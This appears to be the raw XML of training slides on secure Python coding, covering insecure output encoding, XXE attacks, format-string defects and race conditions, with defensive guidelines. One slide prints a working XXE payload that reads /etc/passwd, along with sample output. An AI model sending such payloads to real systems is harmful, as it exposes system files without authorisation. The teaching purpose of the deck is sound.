            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Handle output encoding in a secure way to reduce risk of misinterpretation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Additionally, patch Python to fix </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>urllib.parse.urlsplit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>urllib.parse.urlparse </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>library vulnerabilities.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="377418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Insecure Output Encoding (Slide 2 of 2)</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31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4850350B-D9BA-4DF2-8779-CACAB1A92726}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="898861" y="2470750"/>
            <a:ext cx="6818740" cy="2608168"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE3AFDAA-004D-4B35-B0A4-2ABB6B93A343}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="341924" y="1227471"/>
            <a:ext cx="8460152" cy="4935408"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example: “apple” in Cyrillic looks like “apple” in Latin (English)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2238290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XXE Attacks (Slide 1 of 2)</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4020947"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An XML External Entity (XXE) attack exploits a vulnerability in XML parsing. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It can be used to improperly reference entities from external URLs. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An attacker can use it for:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Denial of Service attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Access of local and remote content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Access services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Server Side Request Forgery (SSRF) attacks </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Port scanning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remote code execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Common XXE implementation is to misuse XML Document Type Definitions (DTDs).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Standard Python library modules </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>etree</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xmlrpc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> are all susceptible to XXE attacks. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>defusedxml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to replace these libraries. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Completely disable DTDs.</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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4259245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17C1F-DBFF-4D86-94F0-D53D79B2AAC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>XXE Attacks (Slide 2 of 2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD0704D2-CDAD-43FC-A4B2-3998C7F1F2A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="341924" y="1160415"/>
            <a:ext cx="8460152" cy="5164185"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>POST http://www.example.com/xml HTTP/1.1 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;?xml version="1.0" encoding="ISO-8859-1"?&gt;  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;!DOCTYPE foo [</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   &lt;!ELEMENT foo ANY&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   &lt;!ENTITY bar\e SYSTEM   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    "file:///etc/passwd"&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;foo&gt;  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp;bar; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/foo&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The results would be something like this: </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HTTP/1.0 200 OK   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>root:x:0:0:root:/root:/bin/bash </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>daemon:x:1:1:daemon:/usr/sbin:/bin/sh</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>bin:x:2:2:bin:/bin:/bin/sh </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sys:x:3:3:sys:/dev:/bin/sh  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>joe:x:4:4:joe:/joe:/bin/sh</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>moo:x:5:5:moo:/moo:/bin/sh</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>lizzie:x:6:6:lizzie:/lizzie:/bin/sh</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9D66F5A-998B-44EB-AACE-A249DD5CD7D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8160BDD-7155-D744-B749-9730458604AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38245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34</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pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Prevent Uncontrolled Format String Defects:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Heed compiler messages that warn about potential format string problems.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Make sure your software does not create format strings from user input.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Prevent Insecure Output Encoding:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Validate that outputs use the expected encoding and character sets.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Apply the latest patches from Python.org to fix vulnerable libraries.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To protect against XXE attacks:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Replace etree, DOM, and xmlrpc libraries with defusedxml.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Completely disable Document Type Definitions.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a:xfrm>
            <a:off x="341925" y="100269"/>
            <a:ext cx="7883768" cy="844611"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="5486400" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Guidelines to Prevent Formatting and Encoding Vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="Image result for checklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9D3BB3E-1819-4F92-AB25-CD3A76BF1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3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35</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Race Condition (Slide 1 of 2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Diagram 4"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1752600" y="1462721"/>
          <a:ext cx="37338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752600" y="2186355"/>
            <a:ext cx="1143000" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="562043" y="2194029"/>
            <a:ext cx="1178528" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Shared</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2933700" y="2186355"/>
            <a:ext cx="1143000" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4114800" y="2186355"/>
            <a:ext cx="1143000" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1620955"/>
            <a:ext cx="936629" cy="292388"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">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Process A</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="16" name="Diagram 15"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4419600" y="2596109"/>
          <a:ext cx="3733800" cy="685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TextBox 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="2754343"/>
            <a:ext cx="1054771" cy="292388"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Process B</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="19" name="Straight Connector 18"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="176378" y="3657600"/>
            <a:ext cx="8672631"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20" name="Diagram 19"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1752600" y="4496807"/>
          <a:ext cx="3733800" cy="685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p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1752600" y="5220441"/>
            <a:ext cx="1143000" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="TextBox 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="594103" y="5228115"/>
            <a:ext cx="1146468" cy="292388"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
